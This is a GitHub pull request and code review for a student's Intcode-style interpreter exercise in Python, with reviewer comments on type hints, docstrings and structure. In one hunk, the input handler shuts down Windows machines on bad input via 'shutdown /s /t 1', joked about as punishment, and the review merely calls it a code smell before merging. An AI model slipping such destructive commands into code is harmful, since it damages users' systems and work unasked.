### PR TITLE
Soeren herrmann/exercises 06

### PR DESCRIPTION
**Pull request by PixelWelt**
output at memory position 0 1102 and Opcode 4 outputs: 33343

### CODE REVIEW

File: Exercises/SoerenHerrmann/exercises_06.py [hunk 1]
```diff
@@ -0,0 +1,245 @@
...
+            lst[destination] = param_one * param_two
+        case operations.LESS_THAN:
+            lst[destination] = 1 if param_one < param_two else 0
+        case operations.EQUALS:
+            lst[destination] = 1 if param_one == param_two else 0
+    logging.debug(f'Calculation: {lst[destination]}')
+    return idx + 1
+
+
+def jump_operation(lst: dict,
```
Comment (Saiki77) [inline Exercises/SoerenHerrmann/exercises_06.py:109]: Same as above.

File: Exercises/SoerenHerrmann/exercises_06.py [hunk 2]
```diff
@@ -0,0 +1,245 @@
...
+    param_one = get_element(param_one_mode, lst, idx, offset)
+    idx += 1
+    param_two = get_element(param_two_mode, lst, idx, offset)
+
+    if (op == operations.JUMP_IF_TRUE and param_one != 0) or (op == operations.JUMP_IF_FALSE and param_one == 0):
+        return param_two
+    return idx + 1
+
+
+def read_value(lst: dict, idx: int) -> int:
```
Comment (Saiki77) [inline Exercises/SoerenHerrmann/exercises_06.py:128]: same as above

File: Exercises/SoerenHerrmann/exercises_06.py [hunk 3]
```diff
@@ -0,0 +1,245 @@
...
+            if platform == "win32":
+                # ! additionaly punish windows users for using Windows and
+                # ! wrong input
+                subprocess.call("shutdown /s /t 1") 
+            continue
+    logging.debug(f'Value: {lst[lst[idx]]} at index {lst[idx]}')
+    return idx + 1
+
+
+def output_value(lst: dict, idx: int, instruction: list, offset: int) -> int:
```
Comment (Saiki77) [inline Exercises/SoerenHerrmann/exercises_06.py:149]: code smell

File: Exercises/SoerenHerrmann/exercises_06.py [hunk 4]
```diff
@@ -0,0 +1,245 @@
...
+    """handles output value operation 4"""
+    param_mode = op_mode(int(instruction[1]))
+    idx += 1
+    output = get_element(param_mode, lst, idx, offset)
+    print(f"Output: {output}")
+    idx += 1
+    return idx
+
+
+def change_offset(offset: int, operation: list, lst: list, idx: int) -> int:
```
Comment (Saiki77) [inline Exercises/SoerenHerrmann/exercises_06.py:159]: Here you actually give lst as list making the above code even more confusing

File: Exercises/SoerenHerrmann/exercises_06.py [hunk 5]
```diff
@@ -0,0 +1,244 @@
...
+    idx += 1
+    param_one: int = get_element(param_mode, dct, idx, offset)
+    offset += param_one
+    idx += 1
+    return offset, idx
+
+
+def check_for_opcode(idx: int, dct: dict, offset: int = 0):
+    operation = str(dct[idx]) 
+    while len(operation) < 4:
```
Comment (Saiki77) [inline Exercises/SoerenHerrmann/exercises_06.py:167]: Define a constant for the length operator

File: Exercises/SoerenHerrmann/exercises_06.py [hunk 6]
```diff
@@ -0,0 +1,244 @@
...
+            dct[destination] = param_one * param_two
+        case operations.LESS_THAN:
+            dct[destination] = 1 if param_one < param_two else 0
+        case operations.EQUALS:
+            dct[destination] = 1 if param_one == param_two else 0
+    logging.debug(f'Calculation: {dct[destination]}')
+    return idx + 1
+
+
+def jump_operation(dct: dict,
```
Comment (Saiki77) [inline Exercises/SoerenHerrmann/exercises_06.py:105]: Add return type hints

File: Exercises/SoerenHerrmann/exercises_06.py [hunk 7]
```diff
@@ -0,0 +1,244 @@
...
+    JUMP_IF_TRUE = 5
+    JUMP_IF_FALSE = 6
+    LESS_THAN = 7
+    EQUALS = 8
+    CHANGE_RELATIVE_OFFSET = 9
+    HALT = 99
+
+
+def get_element(mode: op_mode, dct: dict, idx: int, offset: int) -> int:
+    """returns element based upon the task mode"""
```
Comment (Saiki77) [inline Exercises/SoerenHerrmann/exercises_06.py:71]: Consider adding description for for the parameters

File: Exercises/SoerenHerrmann/exercises_06.py [hunk 8]
```diff
@@ -0,0 +1,244 @@
...
+    match mode:
```
Comment (Saiki77) [inline Exercises/SoerenHerrmann/exercises_06.py:72]: Consider handling potential KeyError exceptions

File: Exercises/SoerenHerrmann/exercises_06.py [hunk 9]
```diff
@@ -0,0 +1,244 @@
...
+        case op_mode.POSITION:
+            return dct.get(dct.get(idx, 0), 0)
+        case op_mode.IMMEDIATE:
+            return dct.get(idx, 0)
+        case op_mode.RELATIVE:
+            return dct.get(dct.get(idx, 0) + offset, 0)
+
+def calc(dct: dict, idx: int, op: operations, instruction: list, offset: int) -> int:
```
Comment (Saiki77) [inline Exercises/SoerenHerrmann/exercises_06.py:80]: Add type hints for instruction list elements

Comment (Saiki77) [reply Exercises/SoerenHerrmann/exercises_06.py:80]: Consider validating instruction length

File: Exercises/SoerenHerrmann/exercises_06.py [hunk 10]
```diff
@@ -0,0 +1,244 @@
...
+    param_two_mode = op_mode(int(instruction[0]))
+
+    idx += 1 
+    param_one = get_element(param_one_mode, dct, idx, offset)
+    idx += 1
+    param_two = get_element(param_two_mode, dct, idx, offset)
+    idx += 1
+    write_mode = op_mode(int(instruction[2]))
+    destination = dct.get(idx, 0) + (offset if write_mode == op_mode.RELATIVE else 0)
+    match op:
```
Comment (Saiki77) [inline Exercises/SoerenHerrmann/exercises_06.py:92]: Consider extracting arithmetic operations into separate methods

File: Exercises/SoerenHerrmann/exercises_06.py (hunk 6 above)
Comment (Saiki77) [reply Exercises/SoerenHerrmann/exercises_06.py:105]: Inconsistent indentation in function parameters compared to other methods

File: Exercises/SoerenHerrmann/exercises_06.py [hunk 11]
```diff
@@ -0,0 +1,244 @@
...
+    """handles output value operation 4"""
+    param_mode = op_mode(int(instruction[1]))
+    idx += 1
+    output = get_element(param_mode, dct, idx, offset)
+    print(f"Output: {output}")
+    idx += 1
+    return idx
+
+
+def change_offset(offset: int, instruction: list, dct: dict, idx: int) -> int:
```
Comment (Saiki77) [inline Exercises/SoerenHerrmann/exercises_06.py:156]: Missing docstring

File: Exercises/SoerenHerrmann/exercises_06.py [hunk 12]
```diff
@@ -0,0 +1,244 @@
...
+    param_mode = op_mode(int(instruction[1]))
+    idx += 1
+    param_one: int = get_element(param_mode, dct, idx, offset)
+    offset += param_one
+    idx += 1
+    return offset, idx
+
+
+def check_for_opcode(idx: int, dct: dict, offset: int = 0):
```
Comment (Saiki77) [inline Exercises/SoerenHerrmann/exercises_06.py:165]: Missing docstring

File: Exercises/SoerenHerrmann/exercises_06.py [hunk 13]
```diff
@@ -0,0 +1,244 @@
...
+    while end is False:
+        idx, end, offset = check_for_opcode(idx, commands, offset)
+    return commands[0]
+
+
+def list_to_dict(lst: list) -> dict:
+    """converts list to a dictionary with values from the list and 
+    enumerated keys e.g. [10,20,30,40] -> {0: 10, 1: 20, 2: 30, 3: 40}"""
+    goal = {} 
+    for index, value in enumerate(lst):
```
Comment (Saiki77) [inline Exercises/SoerenHerrmann/exercises_06.py:221]: You could replace the loop with a dict comprehension: 
    # return {index: int(value) for index, value in enumerate(lst)}

**Review by Saiki77 — APPROVED** [review]

File: Exercises/SoerenHerrmann/exercises_06.py (hunk 9 above)
Comment (PixelWelt) [reply Exercises/SoerenHerrmann/exercises_06.py:81]: is handled by using dict.get(key,default_value)

**Pull request merged**